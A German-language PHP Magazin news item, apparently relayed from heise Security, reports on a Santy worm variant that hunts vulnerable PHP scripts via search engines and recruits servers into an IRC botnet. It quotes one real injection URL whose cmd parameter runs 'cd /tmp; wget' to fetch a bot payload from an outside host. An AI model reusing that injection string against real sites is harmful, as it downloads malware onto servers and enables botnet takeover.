1. PHP Magazin
  2. Software & Web-Development
  3. Wurm attackiert PHP-Skripte

Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de
Author

Erfahrungen

Es sind noch keine Kommentare vorhanden.

Hier Kannst Du einen Kommentar verfassen


Bitte gib mindestens 10 Zeichen ein.
Wird geladen... Bitte warte.
* Pflichtangabe

Verwandte Beiträge

VS.Php 10% günstiger

Die HHK Datentechnik GmbH bietet im Rahmen eines Sonderangebotes die beliebte PHP IDE VS.Php 10 % günstiger an. VS.Php ist eine PHP IDE die auf der Entwicklungsumgebung Visual Studio von Microsoft aufsetzt. Sie ist entweder als Modul oder als allein st ...

admin

Autor : admin
Kategorie: Software & Web-Development

phpCMS Version 1.2.1pl2 veröffentlicht

31. Mai 2005. Das phpCMS Team hat heute die Version 1.2.1pl2 des OpenSource Content Management Systems phpCMS veröffentlicht, die eine in allen phpCMS Versionen seit 1.2.0 enthaltene Sicherheitslücke schließt. Anwender der phpCMS Versionen vor 1.2.1pl2 ...

admin

Autor : admin
Kategorie: Software & Web-Development

PHP-Kongress verpasst?

Soweit wir bisher sehen konnten war der erste Tag ein voller Erfolg. Livebilder vom Kongress könnt Ihr euch unter php.3uu.de anschauen. Wenn Ihr doch noch Zeit finden solltet - Der Kongress geht noch bis zum 6.10.2000. ...

admin

Autor : admin
Kategorie: Software & Web-Development

php4.0.4rc4 steht zum Download bereit!

Und wieder eine neue Version! php4.0.4rc4 steht zum Download bereit! Wer es gleich haben will : Download Viel Spaß ...

admin

Autor : admin
Kategorie: Software & Web-Development

PHP 4.0.4 is draussen!

Wer sie installieren möchte findet die aktuelle Version unter ... (siehe "weiter") Viel Spaß ...

admin

Autor : admin
Kategorie: Software & Web-Development

Sicherheitslücke macht IP sichtbar

Manch User wird diese Nachricht hart treffen, denn einer der größten Anonymisierungsservices, nämlich Anonymizer.com berichtet nun über eine schwere Sicherheitslücke in ihrem System. So waren Benutzer dieses Services trotz gutwilligen Glaubens den Tü ...

admin

Autor : admin
Kategorie: Software & Web-Development

Magazin & Tutorials
ebiz-consult GmbH & Co. KG
Wir entwickeln seit über 20 Jahren Web & E-Commerce Anwendungen
Egelsbach, Deutschland

Pressemitteilung veröffentlichen

pressemitteilung veröffentlichen

Teile Deine News und Informationen mit anderen

Du möchtest andere User über ein interessantes IT-Thema informieren, dann melde Dich jetzt an und teile es mit unserer PHP-Community

mehr erfahren

Angebot eintragen